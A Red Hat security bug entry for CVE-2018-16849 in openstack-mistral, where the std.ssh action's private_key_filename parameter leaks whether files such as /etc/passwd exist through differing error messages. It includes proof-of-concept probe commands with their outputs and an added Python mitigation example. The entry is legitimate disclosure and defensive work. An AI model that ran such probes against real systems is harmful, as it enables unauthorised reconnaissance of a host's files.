Bug 1645334 (CVE-2018-16849) - CVE-2018-16849 openstack-mistral: std.ssh action may disclose presence of arbitrary files
Status: NEW
Alias: CVE-2018-16849
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Priority: medium
Severity: medium
Target Milestone: ---
Assignee: Red Hat Product Security
Whiteboard: impact=moderate,public=20181102,repor...
Keywords: Security
Depends On: 1645350 1645351 1679103
Blocks: 1623055
Reported: 2018-11-02 01:12 UTC by James Hebden
Modified: 2019-05-22 15:16 UTC

An information-disclosure flaw was discovered in openstack-mistral, where the SSH private key filename of a std.ssh action could be manipulated. The flaw could be exploited to determine the presence of a file path on the host executing the std.ssh action, based on the returned error message.

Description James Hebden 2018-11-02 01:12:48 UTC
The std.ssh action can be used to disclose the presence of arbitrary files within the filesystem of the executor running the action.
Since std.ssh private_key_filename can take an absolute path, it can be used to assess whether or not a file exists on the executor's filesystem.

Comment 1 James Hebden 2018-11-02 02:59:43 UTC
Upstream bug: https://bugs.launchpad.net/mistral/+bug/1783708

Comment 3 James Hebden 2018-11-02 03:31:36 UTC
Example from the upstream bug:

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/notthere"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/notthere'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: [Errno 2] No such file or directory: u'/notthere'"}

Running:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/passwd"}'

Returns:
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/passwd'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}


This can help detect the nature of the underlying system:

For example, to test for the presence of a Fedora release file:
mistral run-action std.ssh '{"cmd":"ls","host":"127.0.0.1","username":"root","private_key_filename":"/etc/fedora-release"}'
{"result": "Failed to run action [action_ex_id=None, action_cls='<class 'mistral.actions.action_factory.SSHAction'>', attributes='{}', params='{u'username': u'root', u'host': u'127.0.0.1', u'cmd': u'ls', u'private_key_filename': u'/etc/fedora-release'}']\n Failed to execute ssh cmd 'ls' on [u'127.0.0.1']\nException: not a valid RSA private key file"}
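
The responses quoted above differ only in the exception text, and that difference is what tells a caller whether a path exists. As an added example (not part of the bug report, and not Mistral's own code or its fix), here is one way to close this kind of oracle in Python: accept only a bare file name inside an operator-chosen key directory and return a single message for every failure. The names `load_private_key`, `error_for`, `KeyFileError`, `GENERIC_MSG` and the `key_dir` parameter are hypothetical.

```python
import os
import tempfile


class KeyFileError(Exception):
    """The only error a caller sees for any key-file problem."""


GENERIC_MSG = "SSH private key could not be loaded"


def load_private_key(key_name, key_dir):
    """Return the key bytes for key_name inside key_dir, else raise KeyFileError.

    key_dir is an assumed operator-configured directory; the caller-supplied
    value may only be a bare file name inside it.
    """
    # Refuse absolute paths, separators and dot names before touching the disk.
    if (not key_name or key_name in (".", "..") or "\x00" in key_name
            or os.path.basename(key_name) != key_name):
        raise KeyFileError(GENERIC_MSG)
    base = os.path.realpath(key_dir)
    path = os.path.realpath(os.path.join(base, key_name))
    if os.path.dirname(path) != base:  # symlink pointing out of key_dir
        raise KeyFileError(GENERIC_MSG)
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        # Missing, unreadable or a directory: same text as every other failure.
        raise KeyFileError(GENERIC_MSG) from None
    if not data.startswith(b"-----BEGIN ") or b"PRIVATE KEY-----" not in data:
        raise KeyFileError(GENERIC_MSG)
    return data


def error_for(key_name, key_dir):
    """Return the error text a caller would receive, or None on success."""
    try:
        load_private_key(key_name, key_dir)
    except KeyFileError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:  # constructed sample key directory
        for name in ("/notthere", "/etc/passwd", "absent"):
            print(repr(name), "->", error_for(name, d))
```

The specific cause can still be written to the executor's own log, as long as it is not returned in the action result.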

Comment 6 Laura Pardo 2019-05-22 15:16:03 UTC
Acknowledgments:

Name: the Mistral project

